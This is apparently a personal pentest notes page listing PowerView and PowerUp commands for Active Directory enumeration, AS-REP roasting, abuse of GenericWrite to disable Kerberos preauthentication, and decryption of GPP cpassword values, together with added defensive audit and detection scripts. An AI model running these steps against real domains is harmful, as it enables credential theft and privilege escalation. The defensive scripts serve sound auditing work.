akde/infosec

Information security is ultimately about managing risk


Collection of privesc scripts. To start, upload PowerView.ps1 and:

powershell -exec bypass
PS> Import-Module .\PowerView.ps1

See the GitHub project page for the full command list.

General enumeration

powershell -exec bypass
PS> . .\PowerUp.ps1
PS> Invoke-AllChecks

Or:

powershell.exe -c "Import-Module .\PowerUp.ps1; Invoke-AllChecks"

About users

Enumerates all users.

Get-NetUser

Enumerate all users that do not require Kerberos preauthentication.

Get-NetUser -PreauthNotRequired

  • If any user is listed, AS-REP-roast them.
  • If no user is listed: if you have GenericWrite or GenericAll permissions on another AD user account, use that privilege to disable Kerberos preauthentication on it, then repeat this step.
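The defender-side counterpart to the check above, as an added example (not code from the original page or from PowerSploit): a small audit of the userAccountControl flag that `-PreauthNotRequired` filters on, a live query through the RSAT ActiveDirectory module with the matching remediation cmdlet, and a detector for the AS-REP requests such accounts generate in Security log event 4768. The event records, the account names and the IP addresses are constructed; the SYSVOL/RSAT availability and the field names on the event objects are assumptions.

```powershell
# Added example (not from the original page or PowerSploit).
# Assumes the ActiveDirectory RSAT module for the live query only; the flag
# test and the event detector run offline on constructed data.

# DONT_REQ_PREAUTH is bit 0x400000 of userAccountControl; it is the flag that
# PowerView's -PreauthNotRequired filter matches on.
function Test-PreauthNotRequired {
    param([Parameter(Mandatory)][int]$UserAccountControl)
    $dontReqPreauth = 0x400000
    return (($UserAccountControl -band $dontReqPreauth) -ne 0)
}

# Live audit (needs RSAT and domain connectivity). Every account returned here
# is AS-REP roastable; the fix is
#   Set-ADAccountControl -Identity <sam> -DoesNotRequirePreAuth $false
function Find-PreauthNotRequiredUser {
    Get-ADUser -Filter 'DoesNotRequirePreAuth -eq $true' -Properties userAccountControl, LastLogonDate |
        Select-Object SamAccountName, Enabled, LastLogonDate,
            @{ n = 'uac'; e = { '0x{0:X}' -f $_.userAccountControl } }
}

# Detection: event 4768 (TGT requested) with Pre-Authentication Type 0 means
# the KDC issued an AS-REP without preauthentication. Ticket encryption type
# 0x17 (RC4) is what roasting tools request for an easily crackable hash, so
# the pair is a high-signal filter; any PreAuthType 0 from an unexpected
# client is still worth a look, since AES AS-REPs can be attacked as well.
function Find-AsRepRoastEvent {
    param([Parameter(Mandatory)][object[]]$Events)
    foreach ($e in $Events) {
        if ($e.EventId -eq 4768 -and $e.PreAuthType -eq 0 -and $e.TicketEncryptionType -eq '0x17') {
            [pscustomobject]@{
                Time    = $e.TimeCreated
                Account = $e.TargetUserName
                Client  = $e.IpAddress
            }
        }
    }
}

# Constructed sample records mirroring the fields of event 4768 (not real logs).
$sampleEvents = @(
    [pscustomobject]@{ EventId = 4768; TimeCreated = '2024-01-01T09:00:00'; TargetUserName = 'svc_backup'; PreAuthType = 0; TicketEncryptionType = '0x17'; IpAddress = '10.0.0.55' },
    [pscustomobject]@{ EventId = 4768; TimeCreated = '2024-01-01T09:00:01'; TargetUserName = 'alice';      PreAuthType = 2; TicketEncryptionType = '0x12'; IpAddress = '10.0.0.12' },
    [pscustomobject]@{ EventId = 4768; TimeCreated = '2024-01-01T09:00:02'; TargetUserName = 'svc_legacy'; PreAuthType = 0; TicketEncryptionType = '0x12'; IpAddress = '10.0.0.12' }
)

# NORMAL_ACCOUNT (0x200) with and without DONT_REQ_PREAUTH set.
Test-PreauthNotRequired -UserAccountControl 0x400200
Test-PreauthNotRequired -UserAccountControl 0x200

# Only the RC4 request for svc_backup from 10.0.0.55 survives the filter.
Find-AsRepRoastEvent -Events $sampleEvents | Format-Table
```

Run `Find-PreauthNotRequiredUser` from a domain-joined host with RSAT to get the live list; feed `Find-AsRepRoastEvent` with objects built from `Get-WinEvent` output (the XML fields of 4768 map onto the property names used here) to hunt for roasting activity that has already happened.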

Returns properties for all users (if some are set).

Get-UserProperty

Obtain a list of currently logged-on users.

Get-NetLoggedon [-ComputerName $name]

Get all active sessions against the previously found domain controller dc01.

Get-NetSession -ComputerName dc01

Returns the members of Domain Admins (the default group).

Get-NetGroupMember

Get the last login and pass­word change date:

Get-NetUser | select cn,pwdlastset,lastlogon

About groups

Returns all local groups.

Get-NetLocalGroup

Returns all groups.

Get-NetGroup

Returns the members of a group.

Get-NetGroupMember $groupName

Returns all organizational units (these are not groups).

Get-NetOU

Enumerates local admins on all domain systems.

Invoke-EnumerateLocalAdmin

About computers

Enumerates the forest.

Get-NetForest

Returns the domain controllers of the current domain.

Get-NetDomainController

Returns all computers of this domain.

Get-NetComputer

  • If there are some, try to browse them within PowerShell without mounting:
    get-childitem "\\$computer\C$"

Enumerates all shares in the domain.

Invoke-ShareFinder

Services

Shows active RDP sessions

Get-NetRDPSession

Helpers

Convert a name into a SID.

Convert-NameToSid $name

Convert a SID into a name.

Convert-SidToName $sid

Decrypt a cpassword value taken from Groups.xml in the SYSVOL replication share. (If this doesn't work, copy and paste the function from the script into the PowerShell console and run it afterwards.)

PS> . .\Get-GPPPassword.ps1
PS> Get-DecryptedCpassword $cpasswd
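The administrator's side of the same problem, as an added example (not code from the original page or from PowerSploit): a scanner that walks the SYSVOL policies tree and reports every Group Policy Preference file that still carries a cpassword attribute. MS14-025 stopped Windows from writing new ones but left existing files in place, and since the AES key for cpassword is published, any value found is effectively plaintext; the right response is to delete or replace the preference, so nothing here decrypts. The SYSVOL path layout and the Groups.xml sample are assumptions/constructed.

```powershell
# Added example (not from the original page or PowerSploit).
# Reports cpassword-bearing GPP files without decrypting anything.

# Parse one GPP XML document and return every element carrying a cpassword.
function Get-CpasswordEntry {
    param(
        [Parameter(Mandatory)][xml]$Document,
        [string]$SourcePath = '<in-memory>'
    )
    foreach ($node in $Document.SelectNodes('//*[@cpassword]')) {
        # The Properties element sits under User / Service / Task / Drive etc.;
        # the parent element names the item the secret belongs to.
        $item = $node.ParentNode
        [pscustomobject]@{
            File      = $SourcePath
            Type      = $item.LocalName
            Name      = $item.GetAttribute('name')
            UserName  = $node.GetAttribute('userName')   # empty for task/service entries (they use runAs)
            HasSecret = -not [string]::IsNullOrEmpty($node.GetAttribute('cpassword'))
        }
    }
}

# Walk a SYSVOL tree and report every preference file that carries a cpassword.
# The default path assumes the usual \\<domain>\SYSVOL\<domain>\Policies layout.
function Find-GppCpassword {
    param([string]$Path = "\\$env:USERDNSDOMAIN\SYSVOL\$env:USERDNSDOMAIN\Policies")
    # The six preference types that historically stored cpassword.
    $names = 'Groups.xml', 'Services.xml', 'ScheduledTasks.xml', 'DataSources.xml', 'Printers.xml', 'Drives.xml'
    Get-ChildItem -Path $Path -Recurse -File -Include $names -ErrorAction SilentlyContinue |
        ForEach-Object {
            $file = $_
            try {
                Get-CpasswordEntry -Document ([xml](Get-Content -LiteralPath $file.FullName -Raw)) -SourcePath $file.FullName
            }
            catch {
                Write-Warning "Could not parse $($file.FullName): $_"
            }
        }
}

# Constructed sample mirroring the shape of a Groups.xml written by GPP.
# The cpassword value is an arbitrary placeholder, not a real encrypted secret.
[xml]$sampleGroupsXml = @'
<Groups clsid="{3125E937-EB16-4b4c-9934-544FC6D24D26}">
  <User clsid="{DF5F1855-51E5-4d24-8B1A-D9BDE98BA1D1}" name="LocalAdmin" image="2" changed="2023-05-01 10:00:00" uid="{00000000-0000-0000-0000-000000000001}">
    <Properties action="U" newName="" fullName="" description="" cpassword="PLACEHOLDER-cpassword-VALUE" changeLogon="0" noChange="1" neverExpires="1" acctDisabled="0" userName="LocalAdmin"/>
  </User>
</Groups>
'@

# Offline run on the constructed sample; one row (User / LocalAdmin / HasSecret True).
Get-CpasswordEntry -Document $sampleGroupsXml -SourcePath 'constructed-Groups.xml' | Format-Table

# Live run against SYSVOL from a domain-joined host:
# Find-GppCpassword | Format-Table
```

Every row the live scan returns is a policy to clean up: remove the preference item (or recreate it without a stored password, e.g. via LAPS for local admin accounts) and treat the credential as compromised, since anyone who could read SYSVOL could have recovered it.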
